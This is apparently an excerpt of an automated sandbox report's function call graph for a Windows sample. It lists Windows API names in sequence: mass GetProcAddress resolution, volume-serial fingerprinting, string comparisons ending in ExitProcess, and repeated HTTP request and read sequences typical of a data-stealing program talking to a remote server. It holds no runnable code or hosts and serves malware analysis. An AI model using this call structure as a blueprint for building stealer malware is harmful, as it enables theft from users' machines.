ca45c0 2 API calls 14277->14278 14279 ca33fc 14278->14279 14280 ca45c0 2 API calls 14279->14280 14281 ca3415 14280->14281 14282 ca45c0 2 API calls 14281->14282 14283 ca342e 14282->14283 14284 ca45c0 2 API calls 14283->14284 14285 ca3447 14284->14285 14286 ca45c0 2 API calls 14285->14286 14287 ca3460 14286->14287 14288 ca45c0 2 API calls 14287->14288 14289 ca3479 14288->14289 14290 ca45c0 2 API calls 14289->14290 14291 ca3492 14290->14291 14292 ca45c0 2 API calls 14291->14292 14293 ca34ab 14292->14293 14294 ca45c0 2 API calls 14293->14294 14295 ca34c4 14294->14295 14296 ca45c0 2 API calls 14295->14296 14297 ca34dd 14296->14297 14298 ca45c0 2 API calls 14297->14298 14299 ca34f6 14298->14299 14300 ca45c0 2 API calls 14299->14300 14301 ca350f 14300->14301 14302 ca45c0 2 API calls 14301->14302 14303 ca3528 14302->14303 14304 ca45c0 2 API calls 14303->14304 14305 ca3541 14304->14305 14306 ca45c0 2 API calls 14305->14306 14307 ca355a 14306->14307 14308 ca45c0 2 API calls 14307->14308 14309 ca3573 14308->14309 14310 ca45c0 2 API calls 14309->14310 14311 ca358c 14310->14311 14312 ca45c0 2 API calls 14311->14312 14313 ca35a5 14312->14313 14314 ca45c0 2 API calls 14313->14314 14315 ca35be 14314->14315 14316 ca45c0 2 API calls 14315->14316 14317 ca35d7 14316->14317 14318 ca45c0 2 API calls 14317->14318 14319 ca35f0 14318->14319 14320 ca45c0 2 API calls 14319->14320 14321 ca3609 14320->14321 14322 ca45c0 2 API calls 14321->14322 14323 ca3622 14322->14323 14324 ca45c0 2 API calls 14323->14324 14325 ca363b 14324->14325 14326 ca45c0 2 API calls 14325->14326 14327 ca3654 14326->14327 14328 ca45c0 2 API calls 14327->14328 14329 ca366d 14328->14329 14330 ca45c0 2 API calls 14329->14330 14331 ca3686 14330->14331 14332 ca45c0 2 API calls 14331->14332 14333 ca369f 14332->14333 14334 ca45c0 2 API calls 14333->14334 14335 ca36b8 14334->14335 14336 ca45c0 2 API calls 14335->14336 14337 ca36d1 14336->14337 14338 ca45c0 2 API calls 14337->14338 14339 ca36ea 14338->14339 14340 ca45c0 2 API calls 14339->14340 14341 ca3703 14340->14341 14342 ca45c0 2 API calls 14341->14342 14343 ca371c 14342->14343 14344 ca45c0 2 API calls 14343->14344 14345 ca3735 14344->14345 14346 ca45c0 2 API calls 14345->14346 14347 ca374e 14346->14347 14348 ca45c0 2 API calls 14347->14348 14349 ca3767 14348->14349 14350 ca45c0 2 API calls 14349->14350 14351 ca3780 14350->14351 14352 ca45c0 2 API calls 14351->14352 14353 ca3799 14352->14353 14354 ca45c0 2 API calls 14353->14354 14355 ca37b2 14354->14355 14356 ca45c0 2 API calls 14355->14356 14357 ca37cb 14356->14357 14358 ca45c0 2 API calls 14357->14358 14359 ca37e4 14358->14359 14360 ca45c0 2 API calls 14359->14360 14361 ca37fd 14360->14361 14362 ca45c0 2 API calls 14361->14362 14363 ca3816 14362->14363 14364 ca45c0 2 API calls 14363->14364 14365 ca382f 14364->14365 14366 ca45c0 2 API calls 14365->14366 14367 ca3848 14366->14367 14368 ca45c0 2 API calls 14367->14368 14369 ca3861 14368->14369 14370 ca45c0 2 API calls 14369->14370 14371 ca387a 14370->14371 14372 ca45c0 2 API calls 14371->14372 14373 ca3893 14372->14373 14374 ca45c0 2 API calls 14373->14374 14375 ca38ac 14374->14375 14376 ca45c0 2 API calls 14375->14376 14377 ca38c5 14376->14377 14378 ca45c0 2 API calls 14377->14378 14379 ca38de 14378->14379 14380 ca45c0 2 API calls 14379->14380 14381 ca38f7 14380->14381 14382 ca45c0 2 API calls 14381->14382 14383 ca3910 14382->14383 14384 ca45c0 2 API calls 14383->14384 14385 ca3929 14384->14385 14386 ca45c0 2 API calls 14385->14386 14387 ca3942 14386->14387 14388 ca45c0 2 API calls 14387->14388 14389 ca395b 14388->14389 14390 ca45c0 2 API calls 14389->14390 14391 ca3974 14390->14391 14392 ca45c0 2 API calls 14391->14392 14393 ca398d 14392->14393 14394 ca45c0 2 API calls 14393->14394 14395 ca39a6 14394->14395 14396 ca45c0 2 API calls 14395->14396 14397 ca39bf 14396->14397 14398 ca45c0 2 API calls 14397->14398 14399 ca39d8 14398->14399 14400 ca45c0 2 API calls 14399->14400 14401 ca39f1 14400->14401 14402 ca45c0 2 API calls 14401->14402 14403 ca3a0a 14402->14403 14404 ca45c0 2 API calls 14403->14404 14405 ca3a23 14404->14405 14406 ca45c0 2 API calls 14405->14406 14407 ca3a3c 14406->14407 14408 ca45c0 2 API calls 14407->14408 14409 ca3a55 14408->14409 14410 ca45c0 2 API calls 14409->14410 14411 ca3a6e 14410->14411 14412 ca45c0 2 API calls 14411->14412 14413 ca3a87 14412->14413 14414 ca45c0 2 API calls 14413->14414 14415 ca3aa0 14414->14415 14416 ca45c0 2 API calls 14415->14416 14417 ca3ab9 14416->14417 14418 ca45c0 2 API calls 14417->14418 14419 ca3ad2 14418->14419 14420 ca45c0 2 API calls 14419->14420 14421 ca3aeb 14420->14421 14422 ca45c0 2 API calls 14421->14422 14423 ca3b04 14422->14423 14424 ca45c0 2 API calls 14423->14424 14425 ca3b1d 14424->14425 14426 ca45c0 2 API calls 14425->14426 14427 ca3b36 14426->14427 14428 ca45c0 2 API calls 14427->14428 14429 ca3b4f 14428->14429 14430 ca45c0 2 API calls 14429->14430 14431 ca3b68 14430->14431 14432 ca45c0 2 API calls 14431->14432 14433 ca3b81 14432->14433 14434 ca45c0 2 API calls 14433->14434 14435 ca3b9a 14434->14435 14436 ca45c0 2 API calls 14435->14436 14437 ca3bb3 14436->14437 14438 ca45c0 2 API calls 14437->14438 14439 ca3bcc 14438->14439 14440 ca45c0 2 API calls 14439->14440 14441 ca3be5 14440->14441 14442 ca45c0 2 API calls 14441->14442 14443 ca3bfe 14442->14443 14444 ca45c0 2 API calls 14443->14444 14445 ca3c17 14444->14445 14446 ca45c0 2 API calls 14445->14446 14447 ca3c30 14446->14447 14448 ca45c0 2 API calls 14447->14448 14449 ca3c49 14448->14449 14450 ca45c0 2 API calls 14449->14450 14451 ca3c62 14450->14451 14452 ca45c0 2 API calls 14451->14452 14453 ca3c7b 14452->14453 14454 ca45c0 2 API calls 14453->14454 14455 ca3c94 14454->14455 14456 ca45c0 2 API calls 14455->14456 14457 ca3cad 14456->14457 14458 ca45c0 2 API calls 14457->14458 14459 ca3cc6 14458->14459 14460 ca45c0 2 API calls 14459->14460 14461 ca3cdf 14460->14461 14462 ca45c0 2 API calls 14461->14462 14463 ca3cf8 14462->14463 14464 ca45c0 2 API calls 14463->14464 14465 ca3d11 14464->14465 14466 ca45c0 2 API calls 14465->14466 14467 ca3d2a 14466->14467 14468 ca45c0 2 API calls 14467->14468 14469 ca3d43 14468->14469 14470 ca45c0 2 API calls 14469->14470 14471 ca3d5c 14470->14471 14472 ca45c0 2 API calls 14471->14472 14473 ca3d75 14472->14473 14474 ca45c0 2 API calls 14473->14474 14475 ca3d8e 14474->14475 14476 ca45c0 2 API calls 14475->14476 14477 ca3da7 14476->14477 14478 ca45c0 2 API calls 14477->14478 14479 ca3dc0 14478->14479 14480 ca45c0 2 API calls 14479->14480 14481 ca3dd9 14480->14481 14482 ca45c0 2 API calls 14481->14482 14483 ca3df2 14482->14483 14484 ca45c0 2 API calls 14483->14484 14485 ca3e0b 14484->14485 14486 ca45c0 2 API calls 14485->14486 14487 ca3e24 14486->14487 14488 ca45c0 2 API calls 14487->14488 14489 ca3e3d 14488->14489 14490 ca45c0 2 API calls 14489->14490 14491 ca3e56 14490->14491 14492 ca45c0 2 API calls 14491->14492 14493 ca3e6f 14492->14493 14494 ca45c0 2 API calls 14493->14494 14495 ca3e88 14494->14495 14496 ca45c0 2 API calls 14495->14496 14497 ca3ea1 14496->14497 14498 ca45c0 2 API calls 14497->14498 14499 ca3eba 14498->14499 14500 ca45c0 2 API calls 14499->14500 14501 ca3ed3 14500->14501 14502 ca45c0 2 API calls 14501->14502 14503 ca3eec 14502->14503 14504 ca45c0 2 API calls 14503->14504 14505 ca3f05 14504->14505 14506 ca45c0 2 API calls 14505->14506 14507 ca3f1e 14506->14507 14508 ca45c0 2 API calls 14507->14508 14509 ca3f37 14508->14509 14510 ca45c0 2 API calls 14509->14510 14511 ca3f50 14510->14511 14512 ca45c0 2 API calls 14511->14512 14513 ca3f69 14512->14513 14514 ca45c0 2 API calls 14513->14514 14515 ca3f82 14514->14515 14516 ca45c0 2 API calls 14515->14516 14517 ca3f9b 14516->14517 14518 ca45c0 2 API calls 14517->14518 14519 ca3fb4 14518->14519 14520 ca45c0 2 API calls 14519->14520 14521 ca3fcd 14520->14521 14522 ca45c0 2 API calls 14521->14522 14523 ca3fe6 14522->14523 14524 ca45c0 2 API calls 14523->14524 14525 ca3fff 14524->14525 14526 ca45c0 2 API calls 14525->14526 14527 ca4018 14526->14527 14528 ca45c0 2 API calls 14527->14528 14529 ca4031 14528->14529 14530 ca45c0 2 API calls 14529->14530 14531 ca404a 14530->14531 14532 ca45c0 2 API calls 14531->14532 14533 ca4063 14532->14533 14534 ca45c0 2 API calls 14533->14534 14535 ca407c 14534->14535 14536 ca45c0 2 API calls 14535->14536 14537 ca4095 14536->14537 14538 ca45c0 2 API calls 14537->14538 14539 ca40ae 14538->14539 14540 ca45c0 2 API calls 14539->14540 14541 ca40c7 14540->14541 14542 ca45c0 2 API calls 14541->14542 14543 ca40e0 14542->14543 14544 ca45c0 2 API calls 14543->14544 14545 ca40f9 14544->14545 14546 ca45c0 2 API calls 14545->14546 14547 ca4112 14546->14547 14548 ca45c0 2 API calls 14547->14548 14549 ca412b 14548->14549 14550 ca45c0 2 API calls 14549->14550 14551 ca4144 14550->14551 14552 ca45c0 2 API calls 14551->14552 14553 ca415d 14552->14553 14554 ca45c0 2 API calls 14553->14554 14555 ca4176 14554->14555 14556 ca45c0 2 API calls 14555->14556 14557 ca418f 14556->14557 14558 ca45c0 2 API calls 14557->14558 14559 ca41a8 14558->14559 14560 ca45c0 2 API calls 14559->14560 14561 ca41c1 14560->14561 14562 ca45c0 2 API calls 14561->14562 14563 ca41da 14562->14563 14564 ca45c0 2 API calls 14563->14564 14565 ca41f3 14564->14565 14566 ca45c0 2 API calls 14565->14566 14567 ca420c 14566->14567 14568 ca45c0 2 API calls 14567->14568 14569 ca4225 14568->14569 14570 ca45c0 2 API calls 14569->14570 14571 ca423e 14570->14571 14572 ca45c0 2 API calls 14571->14572 14573 ca4257 14572->14573 14574 ca45c0 2 API calls 14573->14574 14575 ca4270 14574->14575 14576 ca45c0 2 API calls 14575->14576 14577 ca4289 14576->14577 14578 ca45c0 2 API calls 14577->14578 14579 ca42a2 14578->14579 14580 ca45c0 2 API calls 14579->14580 14581 ca42bb 14580->14581 14582 ca45c0 2 API calls 14581->14582 14583 ca42d4 14582->14583 14584 ca45c0 2 API calls 14583->14584 14585 ca42ed 14584->14585 14586 ca45c0 2 API calls 14585->14586 14587 ca4306 14586->14587 14588 ca45c0 2 API calls 14587->14588 14589 ca431f 14588->14589 14590 ca45c0 2 API calls 14589->14590 14591 ca4338 14590->14591 14592 ca45c0 2 API calls 14591->14592 14593 ca4351 14592->14593 14594 ca45c0 2 API calls 14593->14594 14595 ca436a 14594->14595 14596 ca45c0 2 API calls 14595->14596 14597 ca4383 14596->14597 14598 ca45c0 2 API calls 14597->14598 14599 ca439c 14598->14599 14600 ca45c0 2 API calls 14599->14600 14601 ca43b5 14600->14601 14602 ca45c0 2 API calls 14601->14602 14603 ca43ce 14602->14603 14604 ca45c0 2 API calls 14603->14604 14605 ca43e7 14604->14605 14606 ca45c0 2 API calls 14605->14606 14607 ca4400 14606->14607 14608 ca45c0 2 API calls 14607->14608 14609 ca4419 14608->14609 14610 ca45c0 2 API calls 14609->14610 14611 ca4432 14610->14611 14612 ca45c0 2 API calls 14611->14612 14613 ca444b 14612->14613 14614 ca45c0 2 API calls 14613->14614 14615 ca4464 14614->14615 14616 ca45c0 2 API calls 14615->14616 14617 ca447d 14616->14617 14618 ca45c0 2 API calls 14617->14618 14619 ca4496 14618->14619 14620 ca45c0 2 API calls 14619->14620 14621 ca44af 14620->14621 14622 ca45c0 2 API calls 14621->14622 14623 ca44c8 14622->14623 14624 ca45c0 2 API calls 14623->14624 14625 ca44e1 14624->14625 14626 ca45c0 2 API calls 14625->14626 14627 ca44fa 14626->14627 14628 ca45c0 2 API calls 14627->14628 14629 ca4513 14628->14629 14630 ca45c0 2 API calls 14629->14630 14631 ca452c 14630->14631 14632 ca45c0 2 API calls 14631->14632 14633 ca4545 14632->14633 14634 ca45c0 2 API calls 14633->14634 14635 ca455e 14634->14635 14636 ca45c0 2 API calls 14635->14636 14637 ca4577 14636->14637 14638 ca45c0 2 API calls 14637->14638 14639 ca4590 14638->14639 14640 ca45c0 2 API calls 14639->14640 14641 ca45a9 14640->14641 14642 cb9c10 14641->14642 14643 cb9c20 43 API calls 14642->14643 14644 cba036 8 API calls 14642->14644 14643->14644 14645 cba0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14644->14645 14646 cba146 14644->14646 14645->14646 14647 cba153 8 API calls 14646->14647 14648 cba216 14646->14648 14647->14648 14649 cba298 14648->14649 14650 cba21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14648->14650 14651 cba337 14649->14651 14652 cba2a5 6 API calls 14649->14652 14650->14649 14653 cba41f 14651->14653 14654 cba344 9 API calls 14651->14654 14652->14651 14655 cba428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14653->14655 14656 cba4a2 14653->14656 14654->14653 14655->14656 14657 cba4ab GetProcAddress GetProcAddress 14656->14657 14658 cba4dc 14656->14658 14657->14658 14659 cba515 14658->14659 14660 cba4e5 GetProcAddress GetProcAddress 14658->14660 14661 cba612 14659->14661 14662 cba522 10 API calls 14659->14662 14660->14659 14663 cba61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14661->14663 14664 cba67d 14661->14664 14662->14661 14663->14664 14665 cba69e 14664->14665 14666 cba686 GetProcAddress 14664->14666 14667 cb5ca3 14665->14667 14668 cba6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14665->14668 14666->14665 14669 ca1590 14667->14669 14668->14667 15790 ca1670 14669->15790 14672 cba7a0 lstrcpy 14673 ca15b5 14672->14673 14674 cba7a0 lstrcpy 14673->14674 14675 ca15c7 14674->14675 14676 cba7a0 lstrcpy 14675->14676 14677 ca15d9 14676->14677 14678 cba7a0 lstrcpy 14677->14678 14679 ca1663 14678->14679 14680 cb5510 14679->14680 14681 cb5521 14680->14681 14682 cba820 2 API calls 14681->14682 14683 cb552e 14682->14683 14684 cba820 2 API calls 14683->14684 14685 cb553b 14684->14685 14686 cba820 2 API calls 14685->14686 14687 cb5548 14686->14687 14688 cba740 lstrcpy 14687->14688 14689 cb5555 14688->14689 14690 cba740 lstrcpy 14689->14690 14691 cb5562 14690->14691 14692 cba740 lstrcpy 14691->14692 14693 cb556f 14692->14693 14694 cba740 lstrcpy 14693->14694 14734 cb557c 14694->14734 14695 cb51f0 20 API calls 14695->14734 14696 cba8a0 lstrcpy 14696->14734 14697 cb5643 StrCmpCA 14697->14734 14698 cb56a0 StrCmpCA 14700 cb57dc 14698->14700 14698->14734 14699 cba7a0 lstrcpy 14699->14734 14701 cba8a0 lstrcpy 14700->14701 14702 cb57e8 14701->14702 14703 cba820 2 API calls 14702->14703 14706 cb57f6 14703->14706 14704 cba740 lstrcpy 14704->14734 14705 cba820 lstrlen lstrcpy 14705->14734 14708 cba820 2 API calls 14706->14708 14707 cb5856 StrCmpCA 14709 cb5991 14707->14709 14707->14734 14711 cb5805 14708->14711 14710 cba8a0 lstrcpy 14709->14710 14712 cb599d 14710->14712 14713 ca1670 lstrcpy 14711->14713 14714 cba820 2 API calls 14712->14714 14731 cb5811 14713->14731 14716 cb59ab 14714->14716 14715 cb52c0 25 API calls 14715->14734 14718 cba820 2 API calls 14716->14718 14717 cb5a0b StrCmpCA 14719 cb5a28 14717->14719 14720 cb5a16 Sleep 14717->14720 14722 cb59ba 14718->14722 14721 cba8a0 lstrcpy 14719->14721 14720->14734 14723 cb5a34 14721->14723 14724 ca1670 lstrcpy 14722->14724 14725 cba820 2 API calls 14723->14725 14724->14731 14726 cb5a43 14725->14726 14727 cba820 2 API calls 14726->14727 14728 cb5a52 14727->14728 14730 ca1670 lstrcpy 14728->14730 14729 cb578a StrCmpCA 14729->14734 14730->14731 14731->13787 14732 ca1590 lstrcpy 14732->14734 14733 cb593f StrCmpCA 14733->14734 14734->14695 14734->14696 14734->14697 14734->14698 14734->14699 14734->14704 14734->14705 14734->14707 14734->14715 14734->14717 14734->14729 14734->14732 14734->14733 14736 cb754c 14735->14736 14737 cb7553 GetVolumeInformationA 14735->14737 14736->14737 14738 cb7591 14737->14738 14739 cb75fc GetProcessHeap RtlAllocateHeap 14738->14739 14740 cb7619 14739->14740 14741 cb7628 wsprintfA 14739->14741 14743 cba740 lstrcpy 14740->14743 14742 cba740 lstrcpy 14741->14742 14744 cb5da7 14742->14744 14743->14744 14744->13808 14746 cba7a0 lstrcpy 14745->14746 14747 ca4899 14746->14747 15799 ca47b0 14747->15799 14749 ca48a5 14750 cba740 lstrcpy 14749->14750 14751 ca48d7 14750->14751 14752 cba740 lstrcpy 14751->14752 14753 ca48e4 14752->14753 14754 cba740 lstrcpy 14753->14754 14755 ca48f1 14754->14755 14756 cba740 lstrcpy 14755->14756 14757 ca48fe 14756->14757 14758 cba740 lstrcpy 14757->14758 14759 ca490b InternetOpenA StrCmpCA 14758->14759 14760 ca4944 14759->14760 14761 ca4ecb InternetCloseHandle 14760->14761 15805 cb8b60 14760->15805 14763 ca4ee8 14761->14763 15821 ca9ac0 CryptStringToBinaryA 14763->15821 14764 ca4963 15813 cba920 14764->15813 14768 ca4976 14769 cba8a0 lstrcpy 14768->14769 14774 ca497f 14769->14774 14770 cba820 2 API calls 14771 ca4f05 14770->14771 14772 cba9b0 4 API calls 14771->14772 14775 ca4f1b 14772->14775 14773 ca4f27 ctype 14777 cba7a0 lstrcpy 14773->14777 14778 cba9b0 4 API calls 14774->14778 14776 cba8a0 lstrcpy 14775->14776 14776->14773 14790 ca4f57 14777->14790 14779 ca49a9 14778->14779 14780 cba8a0 lstrcpy 14779->14780 14781 ca49b2 14780->14781 14782 cba9b0 4 API calls 14781->14782 14783 ca49d1 14782->14783 14784 cba8a0 lstrcpy 14783->14784 14785 ca49da 14784->14785 14786 cba920 3 API calls 14785->14786 14787 ca49f8 14786->14787 14788 cba8a0 lstrcpy 14787->14788 14789 ca4a01 14788->14789 14791 cba9b0 4 API calls 14789->14791 14790->13811 14792 ca4a20 14791->14792 14793 cba8a0 lstrcpy 14792->14793 14794 ca4a29 14793->14794 14795 cba9b0 4 API calls 14794->14795 14796 ca4a48 14795->14796 14797 cba8a0 lstrcpy 14796->14797 14798 ca4a51 14797->14798 14799 cba9b0 4 API calls 14798->14799 14800 ca4a7d 14799->14800 14801 cba920 3 API calls 14800->14801 14802 ca4a84 14801->14802 14803 cba8a0 lstrcpy 14802->14803 14804 ca4a8d 14803->14804 14805 ca4aa3 InternetConnectA 14804->14805 14805->14761 14806 ca4ad3 HttpOpenRequestA 14805->14806 14808 ca4b28 14806->14808 14809 ca4ebe InternetCloseHandle 14806->14809 14810 cba9b0 4 API calls 14808->14810 14809->14761 14811 ca4b3c 14810->14811 14812 cba8a0 lstrcpy 14811->14812 14813 ca4b45 14812->14813 14814 cba920 3 API calls 14813->14814 14815 ca4b63 14814->14815 14816 cba8a0 lstrcpy 14815->14816 14817 ca4b6c 14816->14817 14818 cba9b0 4 API calls 14817->14818 14819 ca4b8b 14818->14819 14820 cba8a0 lstrcpy 14819->14820 14821 ca4b94 14820->14821 14822 cba9b0 4 API calls 14821->14822 14823 ca4bb5 14822->14823 14824 cba8a0 lstrcpy 14823->14824 14825 ca4bbe 14824->14825 14826 cba9b0 4 API calls 14825->14826 14827 ca4bde 14826->14827 14828 cba8a0 lstrcpy 14827->14828 14829 ca4be7 14828->14829 14830 cba9b0 4 API calls 14829->14830 14831 ca4c06 14830->14831 14832 cba8a0 lstrcpy 14831->14832 14833 ca4c0f 14832->14833 14834 cba920 3 API calls 14833->14834 14835 ca4c2d 14834->14835 14836 cba8a0 lstrcpy 14835->14836 14837 ca4c36 14836->14837 14838 cba9b0 4 API calls 14837->14838 14839 ca4c55 14838->14839 14840 cba8a0 lstrcpy 14839->14840 14841 ca4c5e 14840->14841 14842 cba9b0 4 API calls 14841->14842 14843 ca4c7d 14842->14843 14844 cba8a0 lstrcpy 14843->14844 14845 ca4c86 14844->14845 14846 cba920 3 API calls 14845->14846 14847 ca4ca4 14846->14847 14848 cba8a0 lstrcpy 14847->14848 14849 ca4cad 14848->14849 14850 cba9b0 4 API calls 14849->14850 14851 ca4ccc 14850->14851 14852 cba8a0 lstrcpy 14851->14852 14853 ca4cd5 14852->14853 14854 cba9b0 4 API calls 14853->14854 14855 ca4cf6 14854->14855 14856 cba8a0 lstrcpy 14855->14856 14857 ca4cff 14856->14857 14858 cba9b0 4 API calls 14857->14858 14859 ca4d1f 14858->14859 14860 cba8a0 lstrcpy 14859->14860 14861 ca4d28 14860->14861 14862 cba9b0 4 API calls 14861->14862 14863 ca4d47 14862->14863 14864 cba8a0 lstrcpy 14863->14864 14865 ca4d50 14864->14865 14866 cba920 3 API calls 14865->14866 14867 ca4d6e 14866->14867 14868 cba8a0 lstrcpy 14867->14868 14869 ca4d77 14868->14869 14870 cba740 lstrcpy 14869->14870 14871 ca4d92 14870->14871 14872 cba920 3 API calls 14871->14872 14873 ca4db3 14872->14873 14874 cba920 3 API calls 14873->14874 14875 ca4dba 14874->14875 14876 cba8a0 lstrcpy 14875->14876 14877 ca4dc6 14876->14877 14878 ca4de7 lstrlen 14877->14878 14879 ca4dfa 14878->14879 14880 ca4e03 lstrlen 14879->14880 15819 cbaad0 14880->15819 14883 ca4e32 InternetReadFile 14884 ca4e67 InternetCloseHandle 14883->14884 14889 ca4e5e 14883->14889 14887 cba800 14884->14887 14886 cba9b0 4 API calls 14886->14889 14887->14809 14888 cba8a0 lstrcpy 14888->14889 14889->14883 14889->14884 14889->14886 14889->14888 14891 cbaad0 14890->14891 14892 cb17c4 StrCmpCA 14891->14892 14893 cb17cf ExitProcess 14892->14893 14894 cb17d7 14892->14894 14895 cb19c2 14894->14895 14896 cb18cf StrCmpCA 14894->14896 14897 cb18ad StrCmpCA 14894->14897 14898 cb187f StrCmpCA 14894->14898 14899 cb185d StrCmpCA 14894->14899 14900 cb1913 StrCmpCA 14894->14900 14901 cb1932 StrCmpCA 14894->14901 14902 cb18f1 StrCmpCA 14894->14902 14903 cb1951 StrCmpCA 14894->14903 14904 cb1970 StrCmpCA 14894->14904 14905 cba820 lstrlen lstrcpy 14894->14905 14895->13813 14896->14894 14897->14894 14898->14894 14899->14894 14900->14894 14901->14894 14902->14894 14903->14894 14904->14894 14905->14894 14907 cba7a0 lstrcpy 14906->14907 14908 ca5979 14907->14908 14909 ca47b0 2 API calls 14908->14909 14910 ca5985 14909->14910 14911 cba740 lstrcpy 14910->14911 14912 ca59ba 14911->14912 14913 cba740 lstrcpy 14912->14913 14914 ca59c7 14913->14914 14915 cba740 lstrcpy 14914->14915 14916 ca59d4 14915->14916 14917 cba740 lstrcpy 14916->14917 14918 ca59e1 14917->14918 14919 cba740 lstrcpy 14918->14919 14920 ca59ee InternetOpenA StrCmpCA 14919->14920 14921 ca5a1d 14920->14921 14922 ca5fc3 InternetCloseHandle 14921->14922 14924 cb8b60 3 API calls 14921->14924 14923 ca5fe0 14922->14923 14927 ca9ac0 4 API calls 14923->14927 14925 ca5a3c 14924->14925 14926 cba920 3 API calls 14925->14926 14928 ca5a4f 14926->14928 14929 ca5fe6 14927->14929 14930 cba8a0 lstrcpy 14928->14930 14931 cba820 2 API calls 14929->14931 14933 ca601f ctype 14929->14933 14935 ca5a58 14930->14935 14932 ca5ffd 14931->14932 14934 cba9b0 4 API calls 14932->14934 14937 cba7a0 lstrcpy 14933->14937 14936 ca6013 14934->14936 14939 cba9b0 4 API calls 14935->14939 14938 cba8a0 lstrcpy 14936->14938 14947 ca604f 14937->14947 14938->14933 14940 ca5a82 14939->14940 14941 cba8a0 lstrcpy 14940->14941 14942 ca5a8b 14941->14942 14943 cba9b0 4 API calls 14942->14943 14944 ca5aaa 14943->14944 14945 cba8a0 lstrcpy 14944->14945 14946 ca5ab3 14945->14946 14948 cba920 3 API calls 14946->14948 14947->13819 14949 ca5ad1 14948->14949 14950 cba8a0 lstrcpy 14949->14950 14951 ca5ada 14950->14951 14952 cba9b0 4 API calls 14951->14952 14953 ca5af9 14952->14953 14954 cba8a0 lstrcpy 14953->14954 14955 ca5b02 14954->14955 14956 cba9b0 4 API calls 14955->14956 14957 ca5b21 14956->14957 14958 cba8a0 lstrcpy 14957->14958 14959 ca5b2a 14958->14959 14960 cba9b0 4 API calls 14959->14960 14961 ca5b56 14960->14961 14962 cba920 3 API calls 14961->14962 14963 ca5b5d 14962->14963 14964 cba8a0 lstrcpy 14963->14964 14965 ca5b66 14964->14965 14966 ca5b7c InternetConnectA 14965->14966 14966->14922 14967 ca5bac HttpOpenRequestA 14966->14967 14969 ca5c0b 14967->14969 14970 ca5fb6 InternetCloseHandle 14967->14970 14971 cba9b0 4 API calls 14969->14971 14970->14922 14972 ca5c1f 14971->14972 14973 cba8a0 lstrcpy 14972->14973 14974 ca5c28 14973->14974 14975 cba920 3 API calls 14974->14975 14976 ca5c46 14975->14976 14977 cba8a0 lstrcpy 14976->14977 14978 ca5c4f 14977->14978 14979 cba9b0 4 API calls 14978->14979 14980 ca5c6e 14979->14980 14981 cba8a0 lstrcpy 14980->14981 14982 ca5c77 14981->14982 14983 cba9b0 4 API calls 14982->14983 14984 ca5c98 14983->14984 14985 cba8a0 lstrcpy 14984->14985 14986 ca5ca1 14985->14986 14987 cba9b0 4 API calls 14986->14987 14988 ca5cc1 14987->14988 14989 cba8a0 lstrcpy 14988->14989 14990 ca5cca 14989->14990 14991 cba9b0 4 API calls 14990->14991 14992 ca5ce9 14991->14992 14993 cba8a0 lstrcpy 14992->14993 14994 ca5cf2 14993->14994 14995 cba920 3 API calls 14994->14995 14996 ca5d10 14995->14996 14997 cba8a0 lstrcpy 14996->14997 14998 ca5d19 14997->14998 14999 cba9b0 4 API calls 14998->14999 15000 ca5d38 14999->15000 15001 cba8a0 lstrcpy 15000->15001 15002 ca5d41 15001->15002 15003 cba9b0 4 API calls 15002->15003 15004 ca5d60 15003->15004 15005 cba8a0 lstrcpy 15004->15005 15006 ca5d69 15005->15006 15007 cba920 3 API calls 15006->15007 15008 ca5d87 15007->15008 15009 cba8a0 lstrcpy 15008->15009 15010 ca5d90 15009->15010 15011 cba9b0 4 API calls 15010->15011 15012 ca5daf 15011->15012 15013 cba8a0 lstrcpy 15012->15013 15014 ca5db8 15013->15014 15015 cba9b0 4 API calls 15014->15015 15016 ca5dd9 15015->15016 15017 cba8a0 lstrcpy 15016->15017 15018 ca5de2 15017->15018 15019 cba9b0 4 API calls 15018->15019 15020 ca5e02 15019->15020 15021 cba8a0 lstrcpy 15020->15021 15022 ca5e0b 15021->15022 15023 cba9b0 4 API calls 15022->15023 15024 ca5e2a 15023->15024 15025 cba8a0 lstrcpy 15024->15025 15026 ca5e33 15025->15026 15027 cba920 3 API calls 15026->15027 15028 ca5e54 15027->15028 15029 cba8a0 lstrcpy 15028->15029 15030 ca5e5d 15029->15030 15031 ca5e70 lstrlen 15030->15031 15032 cbaad0 15031->15032 15033 ca5e81 lstrlen GetProcessHeap RtlAllocateHeap 15032->15033 15034 cbaad0 15033->15034 15035 ca5eae lstrlen 15034->15035 15036 ca5ebe 15035->15036 15037 ca5ed7 lstrlen 15036->15037 15038 ca5ee7 15037->15038 15039 ca5ef0 lstrlen 15038->15039 15040 ca5f03 15039->15040 15041 ca5f1a lstrlen 15040->15041 15042 cbaad0 15041->15042 15043 ca5f2a HttpSendRequestA 15042->15043 15044 ca5f35 InternetReadFile 15043->15044 15045 ca5f6a InternetCloseHandle 15044->15045 15049 ca5f61 15044->15049 15045->14970 15047 cba9b0 4 API calls 15047->15049 15048 cba8a0 lstrcpy 15048->15049 15049->15044 15049->15045 15049->15047 15049->15048 15052 cb1077 15050->15052 15051 cb1151 15051->13821 15052->15051 15053 cba820 lstrlen lstrcpy 15052->15053 15053->15052 15059 cb0db7 15054->15059 15055 cb0f17 15055->13829 15056 cb0e27 StrCmpCA 15056->15059 15057 cb0e67 StrCmpCA 15057->15059 15058 cb0ea4 StrCmpCA 15058->15059 15059->15055 15059->15056 15059->15057 15059->15058 15060 cba820 lstrlen lstrcpy 15059->15060 15060->15059 15065 cb0f67 15061->15065 15062 cb1044 15062->13837 15063 cb0fb2 StrCmpCA 15063->15065 15064 cba820 lstrlen lstrcpy 15064->15065 15065->15062 15065->15063 15065->15064 15067 cba740 lstrcpy 15066->15067 15068 cb1a26 15067->15068 15069 cba9b0 4 API calls 15068->15069 15070 cb1a37 15069->15070 15071 cba8a0 lstrcpy 15070->15071 15072 cb1a40 15071->15072 15073 cba9b0 4 API calls 15072->15073 15074 cb1a5b 15073->15074 15075 cba8a0 lstrcpy 15074->15075 15076 cb1a64 15075->15076 15077 cba9b0 4 API calls 15076->15077 15078 cb1a7d 15077->15078 15079 cba8a0 lstrcpy 15078->15079 15080 cb1a86 15079->15080 15081 cba9b0 4 API calls 15080->15081 15082 cb1aa1 15081->15082 15083 cba8a0 lstrcpy 15082->15083 15084 cb1aaa 15083->15084 15085 cba9b0 4 API calls 15084->15085 15086 cb1ac3 